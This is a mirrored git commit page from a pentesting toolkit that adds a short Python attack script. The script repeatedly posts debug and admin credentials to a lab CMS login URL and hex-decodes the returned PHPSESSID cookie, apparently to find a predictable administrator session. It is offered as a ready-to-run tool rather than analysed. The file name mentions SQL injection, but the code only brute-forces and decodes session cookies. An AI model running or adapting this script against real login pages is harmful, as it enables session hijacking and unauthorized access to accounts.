mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-02 06:46:07 -04:00
web exploit
This commit is contained in:
bt3gl
parent
a0c026ca27
commit
662953c17a
17 changed files with 201 additions and 119 deletions
47
Web_Security/SQLi/sqli_COOKIE_brute.py
Executable file
47
Web_Security/SQLi/sqli_COOKIE_brute.py
Executable file
|
|
@ -0,0 +1,47 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
__author__ = "bt3gl"
|
||||
__email__ = "bt33gl@gmail.com"
|
||||
|
||||
import requests
|
||||
|
||||
|
||||
def brute_force_password(URL, PAYLOAD, MAXID):
|
||||
|
||||
for i in range(MAXID):
|
||||
#HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
|
||||
r = requests.post(URL, params=PAYLOAD)
|
||||
|
||||
print(i)
|
||||
print r.text
|
||||
id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
|
||||
print(id_hex.decode('hex'))
|
||||
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
#AUTH = ('admin', 'password')
|
||||
URL = 'http://10.13.37.12/cms/admin/login.php'
|
||||
|
||||
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
|
||||
MAXID = 640
|
||||
|
||||
brute_force_password(URL, PAYLOAD, MAXID)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Loading…
Add table
Add a link
Reference in a new issue